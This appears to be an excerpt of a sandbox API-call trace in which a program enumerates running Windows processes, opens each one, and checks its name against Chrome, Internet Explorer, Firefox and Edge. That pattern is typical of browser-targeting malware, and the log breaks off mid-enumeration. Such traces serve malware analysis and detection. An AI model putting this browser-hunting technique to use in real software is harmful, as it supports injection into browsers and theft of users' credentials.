	[0238.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0238.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7f2c
	[0238.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.933] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0238.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.933] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.933] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0238.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.934] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0238.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x7f30
	[0238.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.935] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0238.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.935] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.935] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0238.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.936] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.936] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0238.937] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7f34
	[0238.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0238.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.937] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0238.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.938] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.938] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0238.939] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7f38
	[0238.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.939] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0238.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.939] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.939] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0238.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.940] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0238.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7f3c
	[0238.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.941] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0238.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.941] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.941] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0238.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.942] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.942] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0238.943] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x7f40
	[0238.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.943] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.943] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.943] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.943] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x7f44
	[0238.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.945] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.947] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x7f48
	[0238.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.947] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.948] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.948] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.948] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x7f4c
	[0238.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.950] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.950] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.951] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.951] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x7f50
	[0238.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.952] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.952] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.952] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.953] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.953] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.954] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x7f54
	[0238.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.956] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7f58
	[0238.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.956] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.956] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.956] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.957] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.957] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.957] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7f5c
	[0238.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.958] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.958] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.959] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.959] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.959] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0238.960] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7f60
	[0238.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.960] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0238.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.960] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.960] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0238.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.961] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.961] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x7f64
	[0238.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.963] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.963] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.963] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.964] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0238.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7f68
	[0238.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.965] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.965] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.965] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.966] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0238.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7f6c
	[0238.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0238.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.967] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0238.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.968] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.968] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0238.969] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7f70
	[0238.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.969] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0238.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.969] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.969] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0238.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.970] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.970] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0238.971] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x7f74
	[0238.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.971] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0238.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.971] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.971] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0238.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.972] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0238.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7f78
	[0238.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.973] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0238.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.973] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.973] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0238.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.974] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0238.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7f7c
	[0238.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.975] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0238.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.975] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.975] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0238.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.976] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.976] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0238.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7f80
	[0238.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.977] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0238.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.978] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.978] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0238.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.978] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0238.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0238.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0238.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x7f84
	[0238.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0238.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0238.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0238.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7f88
	[0238.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.991] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0238.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.991] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0238.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.991] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0238.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0238.992] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0238.992] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0238.993] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7f8c
	[0238.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
